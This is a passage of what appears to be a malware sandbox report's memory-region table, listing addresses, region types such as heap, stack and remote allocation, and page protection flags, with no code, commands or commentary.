page read and write
|
||
2478000
|
remote allocation
|
page execute and read and write
|
||
54DC000
|
stack
|
page read and write
|
||
DCF000
|
stack
|
page read and write
|
||
525000
|
heap
|
page read and write
|
||
554B000
|
heap
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
870000
|
trusted library allocation
|
page execute and read and write
|
||
3CF000
|
stack
|
page read and write
|
||
597000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
A102000
|
direct allocation
|
page execute and read and write
|
||
153000
|
trusted library allocation
|
page execute and read and write
|
||
16C000
|
stack
|
page read and write
|
||
890000
|
direct allocation
|
page read and write
|
||
631000
|
heap
|
page read and write
|
||
960000
|
trusted library allocation
|
page execute and read and write
|
||
4B5E000
|
stack
|
page read and write
|
||
4703000
|
heap
|
page read and write
|
||
60FA000
|
heap
|
page read and write
|
||
378A000
|
trusted library allocation
|
page read and write
|
||
3E63000
|
heap
|
page read and write
|
||
1DE0000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
D6E000
|
stack
|
page read and write
|
||
2200000
|
trusted library allocation
|
page read and write
|
||
4FF5000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
1C421000
|
heap
|
page read and write
|
||
747000
|
heap
|
page read and write
|
||
5868000
|
heap
|
page read and write
|
||
39E000
|
heap
|
page read and write
|
||
2524000
|
heap
|
page read and write
|
||
568F000
|
heap
|
page read and write
|
||
150000
|
trusted library allocation
|
page read and write
|
||
285000
|
heap
|
page read and write
|
||
4A7D000
|
heap
|
page read and write
|
||
190000
|
direct allocation
|
page read and write
|
||
381000
|
heap
|
page read and write
|
||
388A000
|
stack
|
page read and write
|
||
240000
|
heap
|
page read and write
|
||
7FE89980000
|
trusted library allocation
|
page read and write
|
||
1D70000
|
direct allocation
|
page read and write
|
||
3E7E000
|
heap
|
page read and write
|
||
7B7000
|
heap
|
page read and write
|
||
3580000
|
trusted library allocation
|
page read and write
|
||
2952000
|
trusted library allocation
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
292A000
|
trusted library allocation
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
A014000
|
direct allocation
|
page execute and read and write
|
||
2CF000
|
stack
|
page read and write
|
||
3E64000
|
heap
|
page read and write
|
||
263F000
|
stack
|
page read and write
|
||
512D000
|
stack
|
page read and write
|
||
5D0A000
|
heap
|
page read and write
|
||
A0A7000
|
direct allocation
|
page execute and read and write
|
||
1CA5B000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
692000
|
heap
|
page read and write
|
||
340000
|
heap
|
page read and write
|
||
2227F000
|
stack
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
58C1000
|
heap
|
page read and write
|
||
1CB1000
|
heap
|
page read and write
|
||
48E0000
|
trusted library allocation
|
page read and write
|
||
5590000
|
heap
|
page read and write
|
||
160000
|
heap
|
page read and write
|
||
A06F000
|
direct allocation
|
page execute and read and write
|
||
400000
|
unkown
|
page readonly
|
||
7FE8B0A0000
|
trusted library allocation
|
page read and write
|
||
24A0000
|
trusted library allocation
|
page read and write
|
||
507E000
|
stack
|
page read and write
|
||
3451000
|
trusted library allocation
|
page read and write
|
||
4B3000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
2B0000
|
heap
|
page read and write
|
||
23BF000
|
stack
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
6550000
|
direct allocation
|
page execute and read and write
|
||
5C42000
|
heap
|
page read and write
|
||
7FE8AF2C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFFFF81000
|
trusted library allocation
|
page execute read
|
||
1C5F0000
|
heap
|
page read and write
|
||
2500000
|
trusted library allocation
|
page read and write
|
||
340C000
|
heap
|
page read and write
|
||
516E000
|
stack
|
page read and write
|
||
400E000
|
stack
|
page read and write
|
||
3C80000
|
trusted library allocation
|
page read and write
|
||
6EC000
|
heap
|
page read and write
|
||
221BE000
|
stack
|
page read and write
|
||
403F000
|
stack
|
page read and write
|
||
587000
|
heap
|
page read and write
|
||
26C0000
|
trusted library allocation
|
page read and write
|
||
3689000
|
trusted library allocation
|
page read and write
|
||
24F3000
|
trusted library allocation
|
page read and write
|
||
5550000
|
heap
|
page read and write
|
||
46CD000
|
heap
|
page read and write
|
||
5B1B000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
408000
|
unkown
|
page readonly
|
||
A064000
|
direct allocation
|
page execute and read and write
|
||
7FE89680000
|
trusted library allocation
|
page read and write
|
||
47E1000
|
heap
|
page read and write
|
||
280000
|
heap
|
page read and write
|
||
2277000
|
heap
|
page read and write
|
||
170000
|
direct allocation
|
page read and write
|
||
427000
|
unkown
|
page read and write
|
||
4859000
|
heap
|
page read and write
|
||
1A99F000
|
heap
|
page read and write
|
||
6B0000
|
heap
|
page read and write
|
||
341E000
|
heap
|
page read and write
|
||
1D1F000
|
stack
|
page read and write
|
||
554D000
|
heap
|
page read and write
|
||
3E73000
|
heap
|
page read and write
|
||
1D0000
|
trusted library allocation
|
page read and write
|
||
569D000
|
heap
|
page read and write
|
||
7FE895D4000
|
trusted library allocation
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
A031000
|
direct allocation
|
page execute and read and write
|
||
36D000
|
heap
|
page read and write
|
||
35D000
|
heap
|
page read and write
|
||
7FE897B4000
|
trusted library allocation
|
page read and write
|
||
190000
|
trusted library allocation
|
page read and write
|
||
63AB000
|
heap
|
page read and write
|
||
5FC7000
|
heap
|
page read and write
|
||
150000
|
trusted library allocation
|
page read and write
|
||
2C54000
|
trusted library allocation
|
page read and write
|
||
3479000
|
trusted library allocation
|
page read and write
|
||
500E000
|
stack
|
page read and write
|
||
2770000
|
heap
|
page read and write
|
||
8D000
|
stack
|
page read and write
|
||
46F9000
|
heap
|
page read and write
|
||
4AD1000
|
trusted library allocation
|
page read and write
|
||
3CC000
|
heap
|
page read and write
|
||
3410000
|
heap
|
page read and write
|
||
A02B000
|
direct allocation
|
page execute and read and write
|
||
40A000
|
unkown
|
page write copy
|
||
6DD000
|
heap
|
page read and write
|
||
1B77F000
|
stack
|
page read and write
|
||
5552000
|
heap
|
page read and write
|
||
A114000
|
direct allocation
|
page execute and read and write
|
||
50FE000
|
heap
|
page read and write
|
||
30F000
|
stack
|
page read and write
|
||
27EF000
|
stack
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
1F20000
|
heap
|
page read and write
|
||
34E000
|
stack
|
page read and write
|
||
44E0000
|
trusted library allocation
|
page read and write
|
||
558000
|
heap
|
page read and write
|
||
BD0000
|
trusted library allocation
|
page read and write
|
||
5D45000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
6350000
|
heap
|
page read and write
|
||
4705000
|
heap
|
page read and write
|
||
609C000
|
heap
|
page read and write
|
||
31E2000
|
trusted library allocation
|
page read and write
|
||
4A6C000
|
heap
|
page read and write
|
||
459000
|
system
|
page execute and read and write
|
||
482F000
|
heap
|
page read and write
|
||
50B000
|
heap
|
page read and write
|
||
6D1000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4C78000
|
remote allocation
|
page execute and read and write
|
||
A062000
|
direct allocation
|
page execute and read and write
|
||
1C61000
|
heap
|
page read and write
|
||
4C0000
|
trusted library allocation
|
page read and write
|
||
36CA000
|
trusted library allocation
|
page read and write
|
||
5CCF000
|
heap
|
page read and write
|
||
A0BB000
|
direct allocation
|
page execute and read and write
|
||
401000
|
unkown
|
page execute read
|
||
74F000
|
heap
|
page read and write
|
||
300000
|
heap
|
page read and write
|
||
379000
|
heap
|
page read and write
|
||
1F30000
|
heap
|
page execute and read and write
|
||
1A9DB000
|
heap
|
page read and write
|
||
2A7B000
|
trusted library allocation
|
page read and write
|
||
5868000
|
heap
|
page read and write
|
||
4A2D000
|
stack
|
page read and write
|
||
2A07000
|
trusted library allocation
|
page read and write
|
||
21CA000
|
heap
|
page read and write
|
||
7FFFFF88000
|
trusted library allocation
|
page readonly
|
||
66C000
|
heap
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
250000
|
heap
|
page read and write
|
||
1FD0000
|
heap
|
page read and write
|
||
2E0000
|
direct allocation
|
page read and write
|
||
5FD3000
|
heap
|
page read and write
|
||
30B000
|
heap
|
page read and write
|
||
211A000
|
heap
|
page read and write
|
||
677000
|
heap
|
page read and write
|
||
2D3A000
|
trusted library allocation
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
A051000
|
direct allocation
|
page execute and read and write
|
||
220BE000
|
stack
|
page read and write
|
||
7FE89946000
|
trusted library allocation
|
page read and write
|
||
1C258000
|
heap
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
625000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
1E63000
|
direct allocation
|
page read and write
|
||
2D3000
|
trusted library allocation
|
page read and write
|
||
46C9000
|
heap
|
page read and write
|
||
283000
|
heap
|
page read and write
|
||
2460000
|
trusted library allocation
|
page read and write
|
||
617C000
|
heap
|
page read and write
|
||
A106000
|
direct allocation
|
page execute and read and write
|
||
328A000
|
trusted library allocation
|
page read and write
|
||
511E000
|
stack
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
400000
|
system
|
page execute and read and write
|
||
568F000
|
heap
|
page read and write
|
||
A068000
|
direct allocation
|
page execute and read and write
|
||
56CC000
|
heap
|
page read and write
|
||
1CB1F000
|
stack
|
page read and write
|
||
8D2000
|
trusted library allocation
|
page read and write
|
||
6358000
|
heap
|
page read and write
|
||
3278000
|
trusted library allocation
|
page read and write
|
||
3AB4000
|
trusted library allocation
|
page read and write
|
||
3C5E000
|
stack
|
page read and write
|
||
81FF000
|
stack
|
page read and write
|
||
332E000
|
heap
|
page read and write
|
||
4490000
|
trusted library allocation
|
page execute and read and write
|
||
804000
|
trusted library allocation
|
page read and write
|
||
2818000
|
trusted library allocation
|
page read and write
|
||
5830000
|
heap
|
page read and write
|
||
35F000
|
heap
|
page read and write
|
||
2CEB000
|
heap
|
page read and write
|
||
420000
|
trusted library allocation
|
page read and write
|
||
860000
|
trusted library allocation
|
page read and write
|
||
6164000
|
heap
|
page read and write
|
||
3403000
|
heap
|
page read and write
|
||
1A6D8000
|
heap
|
page execute and read and write
|
||
2E78000
|
remote allocation
|
page execute and read and write
|
||
810000
|
trusted library allocation
|
page read and write
|
||
2A0000
|
trusted library allocation
|
page execute and read and write
|
||
7F0000
|
trusted library allocation
|
page read and write
|
||
97000
|
stack
|
page read and write
|
||
86E000
|
stack
|
page read and write
|
||
7FE8B0F0000
|
trusted library allocation
|
page read and write
|
||
360000
|
heap
|
page read and write
|
||
340A000
|
heap
|
page read and write
|
||
33F9000
|
heap
|
page read and write
|
||
266000
|
heap
|
page read and write
|
||
6D8000
|
heap
|
page read and write
|
||
3DDE000
|
heap
|
page read and write
|
||
1B1C0000
|
heap
|
page read and write
|
||
5FEB000
|
heap
|
page read and write
|
||
2519000
|
trusted library allocation
|
page read and write
|
||
2D44000
|
trusted library allocation
|
page read and write
|
||
1C4D6000
|
heap
|
page read and write
|
||
223E000
|
stack
|
page read and write | page guard
|
||
4831000
|
heap
|
page read and write
|
||
46C9000
|
heap
|
page read and write
|
||
59D000
|
heap
|
page read and write
|
||
1C24E000
|
stack
|
page read and write
|
||
3E6B000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
537000
|
heap
|
page read and write
|
||
569D000
|
heap
|
page read and write
|
||
1CC0000
|
heap
|
page execute and read and write
|
||
285000
|
heap
|
page read and write
|
||
390000
|
direct allocation
|
page read and write
|
||
350000
|
heap
|
page read and write
|
||
3AD000
|
direct allocation
|
page read and write
|
||
377B000
|
stack
|
page read and write
|
||
29A000
|
heap
|
page read and write
|
||
1D30000
|
direct allocation
|
page read and write
|
||
215F000
|
stack
|
page read and write
|
||
5578000
|
heap
|
page read and write
|
||
17A000
|
trusted library allocation
|
page read and write
|
||
256E000
|
stack
|
page read and write
|
||
130000
|
trusted library allocation
|
page read and write
|
||
509F000
|
stack
|
page read and write
|
||
23F000
|
stack
|
page read and write
|
||
5CA000
|
heap
|
page read and write
|
||
4A7C000
|
heap
|
page read and write
|
||
3B0000
|
direct allocation
|
page read and write
|
||
222FF000
|
stack
|
page read and write
|
||
252B000
|
heap
|
page read and write
|
||
4C0000
|
heap
|
page read and write
|
||
A053000
|
direct allocation
|
page execute and read and write
|
||
304000
|
heap
|
page execute and read and write
|
||
A112000
|
direct allocation
|
page execute and read and write
|
||
910000
|
trusted library allocation
|
page read and write
|
||
6078000
|
heap
|
page read and write
|
||
7FE8978C000
|
trusted library allocation
|
page read and write
|
||
2BC6000
|
trusted library allocation
|
page read and write
|
||
4DE000
|
heap
|
page read and write
|
||
20F000
|
stack
|
page read and write
|
||
33BC000
|
heap
|
page read and write
|
||
56BA000
|
heap
|
page read and write
|
||
BE0000
|
heap
|
page execute and read and write
|
||
4900000
|
heap
|
page read and write
|
||
6D4000
|
heap
|
page read and write
|
||
27AB000
|
heap
|
page read and write
|
||
4BB0000
|
direct allocation
|
page execute and read and write
|
||
5868000
|
heap
|
page read and write
|
||
26A000
|
heap
|
page read and write
|
||
473000
|
system
|
page execute and read and write
|
||
6032000
|
heap
|
page read and write
|
||
35D000
|
heap
|
page read and write
|
||
21C9E000
|
stack
|
page read and write
|
||
48DE000
|
stack
|
page read and write
|
||
4C7D000
|
stack
|
page read and write
|
||
36D000
|
stack
|
page read and write
|
||
5BB0000
|
trusted library allocation
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
340C000
|
heap
|
page read and write
|
||
910000
|
heap
|
page read and write
|
||
A116000
|
direct allocation
|
page execute and read and write
|
||
5869000
|
heap
|
page read and write
|
||
1AC5F000
|
stack
|
page read and write
|
||
379000
|
heap
|
page read and write
|
||
7FE89787000
|
trusted library allocation
|
page read and write
|
||
7FE8AF56000
|
trusted library allocation
|
page execute and read and write
|
||
53BE000
|
stack
|
page read and write
|
||
E80000
|
trusted library allocation
|
page read and write
|
||
1ABBE000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
3451000
|
trusted library allocation
|
page read and write
|
||
670000
|
heap
|
page read and write
|
||
4857000
|
heap
|
page read and write
|
||
354000
|
heap
|
page read and write
|
||
4B6000
|
heap
|
page read and write
|
||
593000
|
heap
|
page read and write
|
||
3E6D000
|
heap
|
page read and write
|
||
265000
|
stack
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
99C000
|
heap
|
page read and write
|
||
7FE8B210000
|
trusted library allocation
|
page read and write
|
||
46A3000
|
heap
|
page read and write
|
||
6BF000
|
stack
|
page read and write
|
||
393000
|
heap
|
page read and write
|
||
7FE8B080000
|
trusted library allocation
|
page read and write
|
||
320000
|
heap
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
38E000
|
heap
|
page read and write
|
||
7FE8B090000
|
trusted library allocation
|
page read and write
|
||
4857000
|
heap
|
page read and write
|
||
1D50000
|
direct allocation
|
page read and write
|
||
485000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
3EE000
|
stack
|
page read and write
|
||
7FE89960000
|
trusted library allocation
|
page read and write
|
||
48CE000
|
stack
|
page read and write
|
||
585E000
|
heap
|
page read and write
|
||
3E0F000
|
heap
|
page read and write
|
||
252E000
|
trusted library allocation
|
page read and write
|
||
48F9000
|
heap
|
page read and write
|
||
E30000
|
direct allocation
|
page read and write
|
||
7FE8AF20000
|
trusted library allocation
|
page read and write
|
||
1E1F000
|
stack
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
3370000
|
heap
|
page read and write
|
||
A0B3000
|
direct allocation
|
page execute and read and write
|
||
5557000
|
heap
|
page read and write
|
||
3220000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
6C9000
|
heap
|
page read and write
|
||
52BE000
|
stack
|
page read and write
|
||
280000
|
heap
|
page read and write
|
||
1C94E000
|
stack
|
page read and write
|
||
3CC000
|
heap
|
page read and write
|
||
58BA000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
20000
|
heap
|
page read and write
|
||
180000
|
heap
|
page read and write
|
||
50B000
|
heap
|
page read and write
|
||
22D81000
|
heap
|
page read and write
|
||
2A50000
|
heap
|
page read and write
|
||
43C000
|
heap
|
page read and write
|
||
34F0000
|
heap
|
page read and write
|
||
33F3000
|
heap
|
page read and write
|
||
290000
|
heap
|
page read and write
|
||
F00000
|
trusted library allocation
|
page read and write
|
||
3E6F000
|
heap
|
page read and write
|
||
610000
|
heap
|
page read and write
|
||
56D3000
|
heap
|
page read and write
|
||
24A0000
|
heap
|
page read and write
|
||
2D3B000
|
trusted library allocation
|
page read and write
|
||
A052000
|
direct allocation
|
page execute and read and write
|
||
5552000
|
heap
|
page read and write
|
||
5B79000
|
heap
|
page read and write
|
||
1A5E9000
|
stack
|
page read and write
|
||
4AE6000
|
heap
|
page read and write
|
||
228A000
|
heap
|
page read and write
|
||
3F7000
|
heap
|
page read and write
|
||
5FE000
|
heap
|
page read and write
|
||
1C1E000
|
stack
|
page read and write
|
||
3669000
|
trusted library allocation
|
page read and write
|
||
A10A000
|
direct allocation
|
page execute and read and write
|
||
427000
|
unkown
|
page read and write
|
||
A0D000
|
heap
|
page read and write
|
||
53A000
|
heap
|
page read and write
|
||
3285000
|
trusted library allocation
|
page read and write
|
||
270F000
|
stack
|
page read and write
|
||
6238000
|
heap
|
page read and write
|
||
61DA000
|
heap
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
328C000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4852000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
6CC000
|
heap
|
page read and write
|
||
21F7D000
|
stack
|
page read and write
|
||
5D24000
|
heap
|
page read and write
|
||
569F000
|
heap
|
page read and write
|
||
358000
|
heap
|
page read and write
|
||
7FE8B240000
|
trusted library allocation
|
page read and write
|
||
574000
|
heap
|
page read and write
|
||
253000
|
heap
|
page read and write
|
||
2E0000
|
heap
|
page read and write
|
||
1CC8000
|
heap
|
page execute and read and write
|
||
7FE8B070000
|
trusted library allocation
|
page read and write
|
||
3C70000
|
trusted library allocation
|
page read and write
|
||
4FC8000
|
heap
|
page read and write
|
||
2E4F000
|
stack
|
page read and write
|
||
5AEC000
|
heap
|
page read and write
|
||
3E11000
|
heap
|
page read and write
|
||
3650000
|
trusted library allocation
|
page read and write
|
||
4FBC000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
1DCC000
|
heap
|
page read and write
|
||
380000
|
heap
|
page read and write
|
||
2116000
|
heap
|
page read and write
|
||
16C000
|
stack
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
3419000
|
heap
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
A010000
|
direct allocation
|
page execute and read and write
|
||
400000
|
unkown
|
page readonly
|
||
472B000
|
stack
|
page read and write
|
||
519000
|
heap
|
page read and write
|
||
33F0000
|
heap
|
page read and write
|
||
22D000
|
heap
|
page read and write
|
||
56BA000
|
heap
|
page read and write
|
||
393000
|
heap
|
page read and write
|
||
3A1B000
|
stack
|
page read and write
|
||
279B000
|
trusted library allocation
|
page read and write
|
||
4A6C000
|
heap
|
page read and write
|
||
1CAD000
|
heap
|
page read and write
|
||
46AA000
|
heap
|
page read and write
|
||
5170000
|
heap
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
7FE8B052000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
357E000
|
stack
|
page read and write
|
||
58BA000
|
heap
|
page read and write
|
||
E26000
|
heap
|
page execute and read and write
|
||
3C75000
|
trusted library allocation
|
page read and write
|
||
568F000
|
heap
|
page read and write
|
||
6A7A000
|
heap
|
page read and write
|
||
1C48000
|
heap
|
page read and write
|
||
33DD000
|
heap
|
page read and write
|
||
6C8000
|
heap
|
page read and write
|
||
FB0000
|
trusted library allocation
|
page read and write
|
||
1C9B000
|
heap
|
page read and write
|
||
3320000
|
heap
|
page read and write
|
||
3419000
|
heap
|
page read and write
|
||
46B0000
|
heap
|
page read and write
|
||
7FE898C0000
|
trusted library allocation
|
page read and write
|
||
341E000
|
heap
|
page read and write
|
||
2366000
|
heap
|
page read and write
|
||
4CD0000
|
heap
|
page read and write
|
||
3E6D000
|
heap
|
page read and write
|
||
395000
|
heap
|
page read and write
|
||
A108000
|
direct allocation
|
page execute and read and write
|
||
51CF000
|
stack
|
page read and write
|
||
4C7000
|
direct allocation
|
page read and write
|
||
35F000
|
heap
|
page read and write
|
||
38D000
|
heap
|
page read and write
|
||
3DC2000
|
heap
|
page read and write
|
||
830000
|
direct allocation
|
page read and write
|
||
28B0000
|
trusted library allocation
|
page read and write
|
||
1C98000
|
heap
|
page read and write
|
||
6C5000
|
heap
|
page read and write
|
||
3DDE000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
F60000
|
trusted library allocation
|
page read and write
|
||
327E000
|
trusted library allocation
|
page read and write
|
||
6002000
|
heap
|
page read and write
|
||
1B1A6000
|
heap
|
page read and write
|
||
5BBB000
|
heap
|
page read and write
|
||
3EE000
|
stack
|
page read and write
|
||
574000
|
heap
|
page read and write
|
||
1B03F000
|
stack
|
page read and write
|
||
5830000
|
heap
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
40A000
|
unkown
|
page write copy
|
||
7FE896B6000
|
trusted library allocation
|
page execute and read and write
|
||
870000
|
direct allocation
|
page read and write
|
||
5656000
|
heap
|
page read and write
|
||
56BA000
|
heap
|
page read and write
|
||
46BF000
|
heap
|
page read and write
|
||
4C7000
|
heap
|
page read and write
|
||
12431000
|
trusted library allocation
|
page read and write
|
||
41F000
|
system
|
page execute and read and write
|
||
2580000
|
trusted library allocation
|
page read and write
|
||
56BD000
|
heap
|
page read and write
|
||
46A2000
|
heap
|
page read and write
|
||
43F000
|
heap
|
page read and write
|
||
4FE2000
|
heap
|
page read and write
|
||
230000
|
direct allocation
|
page read and write
|
||
7FE8B160000
|
trusted library allocation
|
page read and write
|
||
597000
|
heap
|
page read and write
|
||
2CA0000
|
remote allocation
|
page read and write
|
||
21CA3000
|
heap
|
page read and write
|
||
31CE000
|
stack
|
page read and write
|
||
5A3000
|
heap
|
page read and write
|
||
4360000
|
heap
|
page read and write
|
||
DC0000
|
direct allocation
|
page read and write
|
||
7DF000
|
stack
|
page read and write
|
||
2230000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
48EB000
|
stack
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
18B000
|
direct allocation
|
page read and write
|
||
569F000
|
heap
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
E60000
|
direct allocation
|
page read and write
|
||
FCC000
|
stack
|
page read and write
|
||
4833000
|
heap
|
page read and write
|
||
D70000
|
trusted library allocation
|
page read and write
|
||
51F000
|
heap
|
page read and write
|
||
5BBC000
|
heap
|
page read and write
|
||
89000
|
stack
|
page read and write
|
||
4707000
|
heap
|
page read and write
|
||
2477000
|
heap
|
page read and write
|
||
64C000
|
heap
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
21D5000
|
heap
|
page read and write
|
||
1CB6000
|
heap
|
page read and write
|
||
240000
|
trusted library allocation
|
page read and write
|
||
3414000
|
heap
|
page read and write
|
||
7FE8B140000
|
trusted library allocation
|
page read and write
|
||
67B000
|
heap
|
page read and write
|
||
2813000
|
trusted library allocation
|
page read and write
|
||
A092000
|
direct allocation
|
page execute and read and write
|
||
8C000
|
stack
|
page read and write
|
||
4EBB000
|
stack
|
page read and write
|
||
DD0000
|
direct allocation
|
page read and write
|
||
49F7000
|
trusted library allocation
|
page read and write
|
||
3343000
|
heap
|
page read and write
|
||
365000
|
heap
|
page read and write
|
||
1CB1000
|
heap
|
page read and write
|
||
26F000
|
stack
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
3DC6000
|
heap
|
page read and write
|
||
4661000
|
heap
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
55E000
|
heap
|
page read and write
|
||
4D6000
|
heap
|
page read and write
|
||
49DE000
|
stack
|
page read and write
|
||
676000
|
heap
|
page read and write
|
||
55E000
|
heap
|
page read and write
|
||
48E0000
|
trusted library allocation
|
page read and write
|
||
591000
|
heap
|
page read and write
|
||
2BAA000
|
trusted library allocation
|
page read and write
|
||
367000
|
heap
|
page read and write
|
||
32B0000
|
trusted library allocation
|
page read and write
|
||
435000
|
unkown
|
page read and write
|
||
686000
|
heap
|
page read and write
|
||
1DFF000
|
stack
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
63A000
|
heap
|
page read and write
|
||
591000
|
heap
|
page read and write
|
||
4F2000
|
heap
|
page read and write
|
||
1C76000
|
heap
|
page read and write
|
||
5633000
|
heap
|
page read and write
|
||
2C0000
|
trusted library section
|
page read and write
|
||
7FFFFF80000
|
trusted library allocation
|
page readonly
|
||
410000
|
trusted library section
|
page read and write
|
||
37E000
|
stack
|
page read and write
|
||
8BF000
|
stack
|
page read and write
|
||
68B000
|
heap
|
page read and write
|
||
217E000
|
heap
|
page read and write
|
||
5E20000
|
heap
|
page read and write
|
||
A09F000
|
direct allocation
|
page execute and read and write
|
||
491000
|
heap
|
page read and write
|
||
500000
|
heap
|
page read and write
|
||
1ABB0000
|
heap
|
page read and write
|
||
3A6000
|
heap
|
page read and write
|
||
3A0E000
|
stack
|
page read and write
|
||
7FE8B010000
|
trusted library allocation
|
page read and write
|
||
2513000
|
trusted library allocation
|
page read and write
|
||
24F0000
|
trusted library allocation
|
page read and write
|
||
A0DC000
|
direct allocation
|
page execute and read and write
|
||
3D10000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4856000
|
heap
|
page read and write
|
||
2470000
|
heap
|
page read and write
|
||
4835000
|
heap
|
page read and write
|
||
12451000
|
trusted library allocation
|
page read and write
|
||
1C40E000
|
stack
|
page read and write
|
||
1BC0000
|
heap
|
page read and write
|
||
2F5000
|
heap
|
page read and write
|
||
1C3F2000
|
heap
|
page read and write
|
||
39D000
|
heap
|
page read and write
|
||
2944000
|
trusted library allocation
|
page read and write
|
||
4D0000
|
heap
|
page read and write
|
||
2D35000
|
trusted library allocation
|
page read and write
|
||
3850000
|
trusted library allocation
|
page read and write
|
||
5810000
|
heap
|
page read and write
|
||
643000
|
heap
|
page read and write
|
||
535000
|
heap
|
page read and write
|
||
5FB0000
|
heap
|
page read and write
|
||
2F2000
|
heap
|
page read and write
|
||
50FC000
|
heap
|
page read and write
|
||
8C0000
|
trusted library allocation
|
page read and write
|
||
1EC0000
|
heap
|
page read and write
|
||
1AD5E000
|
stack
|
page read and write
|
||
45D000
|
system
|
page execute and read and write
|
||
33FF000
|
heap
|
page read and write
|
||
6B0000
|
heap
|
page read and write
|
||
A0E4000
|
direct allocation
|
page execute and read and write
|
||
373000
|
heap
|
page read and write
|
||
307000
|
trusted library allocation
|
page read and write
|
||
1E32000
|
heap
|
page read and write
|
||
2D3E000
|
trusted library allocation
|
page read and write
|
||
4E9000
|
heap
|
page read and write
|
||
3A0000
|
heap
|
page read and write
|
||
601A000
|
heap
|
page read and write
|
||
4854000
|
heap
|
page read and write
|
||
68B000
|
heap
|
page read and write
|
||
57D000
|
heap
|
page read and write
|
||
365000
|
heap
|
page read and write
|
||
2513000
|
trusted library allocation
|
page read and write
|
||
4A69000
|
heap
|
page read and write
|
||
3279000
|
trusted library allocation
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
3DC6000
|
heap
|
page read and write
|
||
21B0000
|
heap
|
page read and write
|
||
7FE8B054000
|
trusted library allocation
|
page read and write
|
||
50F000
|
heap
|
page read and write
|
||
422000
|
unkown
|
page read and write
|
||
21CD0000
|
trusted library allocation
|
page read and write
|
||
6BF000
|
heap
|
page read and write
|
||
69F000
|
heap
|
page read and write
|
||
2A0000
|
heap
|
page read and write
|
||
288000
|
trusted library allocation
|
page read and write
|
||
22C81000
|
heap
|
page read and write
|
||
A0BF000
|
direct allocation
|
page execute and read and write
|
||
400000
|
system
|
page execute and read and write
|
||
4A3E000
|
stack
|
page read and write
|
||
4A7C000
|
heap
|
page read and write
|
||
26FF000
|
stack
|
page read and write
|
||
4BF000
|
stack
|
page read and write
|
||
2940000
|
trusted library allocation
|
page read and write
|
||
A0A1000
|
direct allocation
|
page execute and read and write
|
||
48F9000
|
heap
|
page read and write
|
||
21DD0000
|
heap
|
page read and write
|
||
52F000
|
stack
|
page read and write
|
||
5552000
|
heap
|
page read and write
|
||
A100000
|
direct allocation
|
page execute and read and write
|
||
62C000
|
heap
|
page read and write
|
||
3278000
|
trusted library allocation
|
page read and write
|
||
28AE000
|
trusted library allocation
|
page read and write
|
||
375000
|
heap
|
page read and write
|
||
6106000
|
heap
|
page read and write
|
||
4880000
|
trusted library allocation
|
page read and write
|
||
34C0000
|
trusted library allocation
|
page read and write
|
||
2974000
|
trusted library allocation
|
page read and write
|
||
4E4000
|
heap
|
page read and write
|
||
2A0000
|
direct allocation
|
page read and write
|
||
5CFF000
|
heap
|
page read and write
|
||
1C44F000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
20000
|
heap
|
page read and write
|
||
7FE89870000
|
trusted library allocation
|
page read and write
|
||
8270000
|
heap
|
page read and write
|
||
49F000
|
heap
|
page read and write
|
||
1D0000
|
heap
|
page read and write
|
||
306C000
|
stack
|
page read and write
|
||
40A000
|
unkown
|
page read and write
|
||
A090000
|
direct allocation
|
page execute and read and write
|
||
260000
|
heap
|
page read and write
|
||
340C000
|
heap
|
page read and write
|
||
249E000
|
stack
|
page read and write
|
||
51A3000
|
heap
|
